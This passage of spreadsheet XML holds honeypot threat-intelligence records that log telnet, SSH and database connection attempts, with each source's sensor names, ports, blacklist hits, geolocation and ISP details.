    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Jaitpur)"/>
    <s v="1261481"/>
    <s v="110044"/>
    <s v="28.5082"/>
    <s v="77.3308"/>
    <s v="152530"/>
    <s v="FELET SERVICES PRIVATE LIMITED"/>
    <s v="Felet Services Private Limited"/>
    <s v="business"/>
    <s v="Felet Services Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9d42:672d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2753"/>
    <x v="2753"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:00:58"/>
    <d v="2024-09-09T12:38:00"/>
    <d v="2025-04-07T10:00:58"/>
    <n v="89"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H23"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;58669&amp;&amp;23626&amp;&amp;46479&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b008:c39a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2754"/>
    <x v="2754"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:00:58"/>
    <d v="2025-03-25T14:28:33"/>
    <d v="2025-04-07T10:00:58"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA&amp;&amp;47198"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:5ff1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2755"/>
    <x v="2755"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:00:57"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-07T10:00:57"/>
    <n v="128"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;25921&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="23"/>
    <s v="Zaporizhzhia"/>
    <s v="Zaporizhzhia Raion"/>
    <s v="Zaporizhzhya"/>
    <s v="687700"/>
    <s v="NA"/>
    <s v="47.8388"/>
    <s v="35.1396"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:4bad"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2756"/>
    <x v="2756"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:53:28"/>
    <d v="2024-07-09T09:16:00"/>
    <d v="2025-04-07T09:53:28"/>
    <n v="305"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2012-04-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:e88b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2757"/>
    <x v="2757"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:51:22"/>
    <d v="2025-04-07T09:51:22"/>
    <d v="2025-04-07T09:51:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f5:d245"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2758"/>
    <x v="2758"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:38:48"/>
    <d v="2024-05-23T04:55:22"/>
    <d v="2025-04-07T09:38:48"/>
    <n v="1489"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;13056&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:52ae"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2759"/>
    <x v="2759"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:35:54"/>
    <d v="2023-08-30T16:38:46"/>
    <d v="2025-04-07T09:35:54"/>
    <n v="230"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MYSQL_H43&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="52686&amp;&amp;1433&amp;&amp;445&amp;&amp;64166&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (MIDC Industrial Area)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.0652"/>
    <s v="73.0289"/>
    <s v="45820"/>
    <s v="TTSL-ISP DIVISION"/>
    <s v="Tata Teleservices LTD - Tata Indicom - Cdma Division"/>
    <s v="cellular"/>
    <s v="Tata Teleservices LTD Cdma"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e63:5b09"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2760"/>
    <x v="2760"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:25:06"/>
    <d v="2025-04-07T09:25:06"/>
    <d v="2025-04-07T09:25:06"/>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d7:120e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2761"/>
    <x v="2761"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:12:01"/>
    <d v="2025-04-07T09:10:02"/>
    <d v="2025-04-07T09:12:01"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad (Ambedkar Colony)"/>
    <s v="1269843"/>
    <s v="500013"/>
    <s v="17.4065"/>
    <s v="78.4723"/>
    <s v="10225"/>
    <s v="Nettlinx Limited"/>
    <s v="Nettlinx"/>
    <s v="business"/>
    <s v="Nettlinx Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca35:5205"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2762"/>
    <x v="2762"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:06:55"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-07T09:06:55"/>
    <n v="181"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;39720&amp;&amp;53286&amp;&amp;43496&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="23"/>
    <s v="Zaporizhzhia"/>
    <s v="Zaporizhzhia Raion"/>
    <s v="Zaporizhzhya"/>
    <s v="687700"/>
    <s v="NA"/>
    <s v="47.8388"/>
    <s v="35.1396"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="2010-05-17"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:6c94"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2763"/>
    <x v="2763"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:04:22"/>
    <d v="2025-04-07T09:04:22"/>
    <d v="2025-04-07T09:04:22"/>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3b61:f676"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2764"/>
    <x v="2764"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:01:31"/>
    <d v="2024-11-23T07:53:05"/>
    <d v="2025-04-07T09:01:31"/>
    <n v="74"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2011-05-13"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b008:cc59"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2765"/>
    <x v="2765"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:01:26"/>
    <d v="2025-03-15T01:59:03"/>
    <d v="2025-04-07T09:01:26"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="53"/>
    <s v="Poltava"/>
    <s v="Kremenchuk Raion"/>
    <s v="Horishni Plavni"/>
    <s v="6559559"/>
    <s v="NA"/>
    <s v="49.0084"/>
    <s v="33.6293"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="2012-04-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:2f3e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2766"/>
    <x v="2766"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T09:01:02"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-07T09:01:02"/>
    <n v="144"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;47378&amp;&amp;54124"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:2742"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2767"/>
    <x v="2767"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T08:34:00"/>
    <d v="2023-12-03T13:22:00"/>
    <d v="2025-04-07T08:34:00"/>
    <n v="117"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1741&amp;&amp;57553&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
